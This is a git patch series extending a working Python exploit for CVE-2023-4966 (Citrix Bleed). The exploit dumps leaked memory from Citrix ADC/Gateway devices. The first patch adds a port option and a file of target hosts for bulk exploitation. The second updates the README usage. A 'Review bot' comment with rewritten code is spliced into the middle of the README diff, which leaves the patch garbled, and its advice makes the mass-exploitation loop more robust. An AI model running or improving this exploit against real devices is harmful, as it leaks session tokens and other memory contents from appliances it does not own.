From 75e6edfd9004ad387252f4991c28f27590b9d08d Mon Sep 17 00:00:00 2001
From: Andy Gill
Date: Tue, 7 Nov 2023 17:20:01 +0000
Subject: [PATCH 1/2] added custom port and ability to supply a list of hosts and custom port
---
 citrix/CVE-2023-4966/exploit.py | 28 ++++++++++++++++++++--------
 1 file changed, 20 insertions(+), 8 deletions(-)
diff --git a/citrix/CVE-2023-4966/exploit.py b/citrix/CVE-2023-4966/exploit.py
index 8105c3a..e8dc3e2 100755
--- a/citrix/CVE-2023-4966/exploit.py
+++ b/citrix/CVE-2023-4966/exploit.py
@@ -8,22 +8,34 @@ parser = argparse.ArgumentParser()
 parser.add_argument('--target', help='The Citrix ADC / Gateway target, excluding the protocol (e.g. 192.168.1.200)')
+parser.add_argument("-p", "--port", help = "Target port", default = 443)
+parser.add_argument('--file', help='Path to a text file containing a list of hosts, one per line')
 args = parser.parse_args()
-if args.target is None:
-    print('Target must be provided (e.g. --target 192.168.1.200)')
+if args.target is None and args.file is None:
+    print('Either a target or a file containing hosts must be provided (e.g., --target 192.168.1.200 or --file hosts.txt)')
     sys.exit(0)
-hostname = args.target
-
-if __name__ == "__main__":
+def test_host(hostname, port):
     headers = {
         "Host": "a"*24576
     }
-    r = requests.get(f"https://{hostname}/oauth/idp/.well-known/openid-configuration", headers=headers, verify=False,timeout=10)
+    r = requests.get(f"https://{hostname}:{port}/oauth/idp/.well-known/openid-configuration", headers=headers, verify=False, timeout=10)
     if r.status_code == 200:
-        print("--- Dumped Memory ---")
+        print(f"--- Dumped Memory for {hostname}:{port} ---")
         print(r.text[131050:])
         print("--- End ---")
     else:
-        print("Could not dump memory")
+        print(f"Could not dump memory for {hostname}:{port}")
+
+if args.target:
+    hostname = args.target
+    port = int(args.port)
+    test_host(hostname, port)
+
+if args.file:
+    with open(args.file, 'r') as file:
+        for line in file:
+            hostname = line.strip()
+            port = int(args.port)
+            test_host(hostname, port)
From 19ac3902e3b434e5a23d0f71e297a76131c4481b Mon Sep 17 00:00:00 2001
From: Andy Gill
Date: Tue, 7 Nov 2023 17:21:45 +0000
Subject: [PATCH 2/2] added additional options
---
 citrix/CVE-2023-4966/README.md | 8 +++++---
 1 file changed, 5 insertions(+), 3 deletions(-)
diff --git a/citrix/CVE-2023-4966/README.md b/citrix/CVE-2023-4966/README.md
index 8691b55..9198553 100644
--- a/citrix/CVE-2023-4966/README.md
+++ b/citrix/CVE-2023-4966/README.md
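Review bot: In the new `--file` loop, one host that refuses the connection or times out raises requests.exceptions.RequestException out of test_host and aborts the whole run, so the remaining hosts in the file are never tested; blank or commented lines in the file also reach test_host as an empty hostname and produce a malformed URL. Catch RequestException per host inside test_host and continue, and skip lines that strip to empty or start with `#`. Declaring the option with `type=int` would let argparse reject a non-numeric `--port` at parse time instead of the two `int(args.port)` casts failing later with a traceback. The rewrite below leaves the single-target path as it is apart from dropping the cast.
```python
parser.add_argument("-p", "--port", help="Target port", type=int, default=443)
# … unchanged: --file argument, usage check, headers dict …
    try:
        r = requests.get(f"https://{hostname}:{port}/oauth/idp/.well-known/openid-configuration", headers=headers, verify=False, timeout=10)
    except requests.exceptions.RequestException as exc:
        print(f"Could not reach {hostname}:{port}: {exc}")
        return
    # … unchanged: status check and memory dump output …
# … unchanged: single --target path (pass args.port directly) …
if args.file:
    with open(args.file, 'r') as file:
        for line in file:
            hostname = line.strip()
            if not hostname or hostname.startswith('#'):
                continue
            test_host(hostname, args.port)
```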
@@ -7,9 +7,11 @@ Read more at our blog: [https://www.assetnote.io/resources/research/citrix-bleed
 # Usage:
 ```
-usage: exploit.py [-h] [--target TARGET]
+usage: exploit.py [-h] [--target TARGET] [--port PORT] [--file FILE]
 optional arguments:
-  -h, --help       show this help message and exit
-  --target TARGET  The Citrix ADC / Gateway target, excluding the protocol (e.g. 192.168.1.200)
+  -h, --help            show this help message and exit
+  --target TARGET       The Citrix ADC / Gateway target, excluding the protocol (e.g. 192.168.1.200)
+  -p PORT, --port PORT  Default target port
+  --file FILE           Path to a text file containing a list of hosts, one per line
 ```